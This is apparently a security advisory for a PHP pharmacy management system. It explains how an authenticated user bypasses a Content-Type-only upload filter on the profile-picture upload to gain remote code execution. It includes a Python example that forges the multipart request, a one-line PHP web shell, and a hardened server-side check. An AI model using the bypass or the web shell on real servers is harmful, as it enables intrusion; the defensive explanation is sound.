What is Pharmacy Management System?
Software vendor: https://code-projects.org/pharmacy-management-system-in-php-with-source-code/
An attacker authenticated with any account role (Administrator, Manager, Pharmacist, or Salesperson) can exploit the vulnerability to upload a PHP file and achieve remote code execution on the server hosting the application.
At least one vulnerable point was identified: the profile-picture upload handled by the add.php file accepts a malicious file. The only filter the application applies is a check on the Content-Type of the uploaded file, a value that is sent by the client and is therefore entirely under the attacker's control.
The following image shows the list of Content-Type values accepted by the check in add.php:
With this knowledge we can upload a PHP file containing a command-execution payload, as shown in the image below:
When uploading the file, the Content-Type of the file part must be replaced, changing application/octet-stream to one of the values accepted by the code; here image/png is used. The following image shows the Content-Type header being replaced:
Afterwards, open the main dashboard, right-click the profile picture and open its link in a new tab. Because the uploaded file is stored in a web-accessible directory with its .php extension intact, the PHP interpreter executes it, and commands can be passed through the parameter chosen in the payload. The following image shows the payload returning the user account under which the web server runs on the local machine.
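The bypass described above, and the server-side check that defeats it, as an added example. This is illustrative code written for this page, not the application's own add.php: the form field name profile_picture, the exact allow-list, and the storage-name scheme are assumptions. build_multipart does what the header replacement in the proxy does (declares image/png for a body that is really PHP); vulnerable_store_name models a handler that trusts the client's Content-Type and keeps the client's filename, while hardened_store_name ignores the declared type, sniffs magic bytes, and chooses its own storage name.

```python
"""Upload filter bypass via client-supplied Content-Type, and a hardened check.

Added illustrative example; not code from the Pharmacy Management System.
Field names, allow-list and storage-name scheme are assumptions.
"""
import os
import secrets
import uuid

# Assumed allow-list of the kind the advisory describes in add.php. The value
# compared against it is $_FILES['...']['type'], i.e. the Content-Type header
# of the multipart file part, which the client (attacker) sets freely.
ALLOWED_CONTENT_TYPES = {"image/png", "image/jpeg", "image/gif"}

# Magic-byte signatures of the image formats the server actually wants.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ("image/png", "png"),
    b"\xff\xd8\xff": ("image/jpeg", "jpg"),
    b"GIF87a": ("image/gif", "gif"),
    b"GIF89a": ("image/gif", "gif"),
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}


def build_multipart(field, filename, data, declared_type, boundary=None):
    """Build a multipart/form-data body with one file part.

    declared_type is the Content-Type written into the part header; setting it
    to image/png while `data` is PHP source is exactly the header replacement
    the advisory performs. Returns (Content-Type request header, body bytes).
    """
    boundary = boundary or "----WebKitFormBoundary" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {declared_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def vulnerable_store_name(declared_type, filename):
    """Vulnerable pattern: trust the declared type, keep the client's filename.

    Returns the name the file would be saved under, or None if rejected.
    A shell.php part declared as image/png is accepted and stored as shell.php.
    """
    if declared_type not in ALLOWED_CONTENT_TYPES:
        return None
    return filename


def hardened_store_name(filename, data):
    """Hardened pattern: ignore the declared type entirely.

    1. Sniff the first bytes for a known image signature.
    2. Require an image extension on the client name (defence in depth only).
    3. Return a server-generated name whose extension comes from the detected
       type, so no client-controlled string reaches the filesystem.
    Returns the storage name, or None if rejected.
    """
    detected = None
    for signature, info in MAGIC.items():
        if data.startswith(signature):
            detected = info
            break
    if detected is None:
        return None
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return f"{uuid.uuid4().hex}.{detected[1]}"


def demo():
    """Run the attacker's request through both checks; returns the outcomes."""
    payload = b"<?php system($_GET['cmd']); ?>"  # constructed sample web shell
    _, body = build_multipart("profile_picture", "shell.php", payload, "image/png")
    return {
        "body_declares_png": b"Content-Type: image/png" in body,
        "vulnerable": vulnerable_store_name("image/png", "shell.php"),
        "hardened": hardened_store_name("shell.php", payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Even with the hardened check, a PNG that carries PHP in a trailing chunk is still stored; that is why the stored extension must be one the web server never hands to the PHP interpreter, and why uploads are best kept outside the document root or served from a directory with script execution disabled. In PHP itself the sniffing step corresponds to finfo_file with FILEINFO_MIME_TYPE or getimagesize rather than $_FILES['...']['type'].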